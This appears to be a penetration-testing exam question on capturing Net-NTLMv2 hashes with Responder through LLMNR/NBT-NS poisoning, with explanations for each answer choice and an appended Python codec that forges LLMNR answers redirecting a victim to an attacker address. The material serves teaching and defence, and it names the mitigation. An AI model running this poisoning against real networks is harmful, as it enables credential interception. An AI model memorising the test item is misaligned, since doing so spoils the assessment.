A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?
- A. Responder with LLMNR/NBT-NS/mDNS poisoning (correct)
Why right: when DNS fails to resolve a name (a mistyped share, a stale shortcut), Windows hosts fall back to multicast/broadcast resolution: LLMNR on UDP/5355, NBT-NS on UDP/137, mDNS on UDP/5353. Responder listens for those queries and answers them with the tester's own IP, so the victim connects to the tester's host (SMB, HTTP, and other services Responder emulates) and authenticates to it. The tester sends no authentication traffic of its own; the victim initiates it. What is captured is the Net-NTLMv2 challenge/response, not the stored NT hash: it can be cracked offline (for example, hashcat mode 5600) but cannot be replayed for pass-the-hash. Because the technique depends on the victim's fallback resolution, disabling LLMNR and NBT-NS on the clients is the usual mitigation.
- B. Metasploit's hashdump module
Why wrong: hashdump reads the SAM database through an existing SYSTEM-level session on a host that is already compromised; it dumps stored NT hashes, it does not capture them from the network.
- C. Hashcat with a wordlist attack
Why wrong: Hashcat cracks hashes that have already been captured; it does not capture them.
- D. Bettercap with ARP spoofing
Why wrong: ARP spoofing puts the tester in the path of existing traffic between two hosts, but it does not by itself cause any host to authenticate to the tester. It only redirects traffic; it does not solicit the NTLMv2 authentication that the question asks for.
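The poisoning step described for option A, as an added example that is not Responder's code: a minimal LLMNR codec that parses a victim's multicast query and builds the spoofed answer a poisoner would send back. The host name `fileshare01`, the transaction ID, the attacker address `10.0.0.66` and the 30-second TTL are constructed sample values, and the `victim_accepts` check is a simplified model of the resolver (it only matches the transaction ID and the queried name); the point it demonstrates is that the poisoner must echo both from the live query rather than spray fixed packets.

```python
"""Minimal LLMNR query/answer codec (RFC 4795 wire format, DNS-style).
Added illustration of how an LLMNR poisoner answers a broadcast lookup;
this is not Responder's own code."""
import ipaddress
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR IPv4 multicast group, UDP/5355
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000               # bit 15 of the flags word: 1 = response


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, zero terminator."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode labels starting at `off`; return (name, offset after terminator)."""
    labels = []
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            return ".".join(labels), off
        if ln & 0xC0:
            raise ValueError("compression pointers are not used in LLMNR questions")
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What a Windows host multicasts when DNS fails to resolve `name`."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes) -> dict:
    """Parse a single-question LLMNR query into its fields."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & FLAG_QR or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30):
    """Poisoner's reply: same transaction ID, same question, one A record that
    points at the attacker. The 30 s TTL is an assumed value. Returns None for
    questions that are not IN/A, which this example does not answer."""
    q = parse_query(query)
    if (q["qtype"], q["qclass"]) != (QTYPE_A, QCLASS_IN):
        return None
    header = struct.pack("!HHHHHH", q["txid"], FLAG_QR, 1, 1, 0, 0)
    rr = encode_name(q["name"]) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
    return header + q["question"] + rr + ipaddress.IPv4Address(attacker_ip).packed


def parse_answer(pkt: bytes):
    """Return (txid, answered name, IPv4 string) from a one-answer response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & FLAG_QR or qdcount != 1 or ancount != 1:
        raise ValueError("not a single-answer LLMNR response")
    _, off = decode_name(pkt, 12)       # skip the echoed question name
    off += 4                            # skip QTYPE/QCLASS
    name, off = decode_name(pkt, off)   # answer RR name
    rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    if (rtype, rclass, rdlen) != (QTYPE_A, QCLASS_IN, 4):
        raise ValueError("unexpected resource record")
    return txid, name, str(ipaddress.IPv4Address(pkt[off + 10:off + 14]))


def victim_accepts(query: bytes, answer: bytes) -> bool:
    """Simplified resolver check: an answer is honoured only if its transaction
    ID and name match the outstanding query, so the poisoner must copy both."""
    q = parse_query(query)
    txid, name, _ = parse_answer(answer)
    return txid == q["txid"] and name.lower() == q["name"].lower()


if __name__ == "__main__":
    q = build_query(0x1234, "fileshare01")      # constructed sample query
    a = build_poisoned_answer(q, "10.0.0.66")   # attacker address is assumed
    print(parse_answer(a), victim_accepts(q, a))
```

On a real segment the query arrives on the multicast group/port above and the answer is sent unicast back to the querier; after the victim accepts it, the subsequent SMB or HTTP connection to the attacker's address is where the Net-NTLMv2 challenge/response is collected.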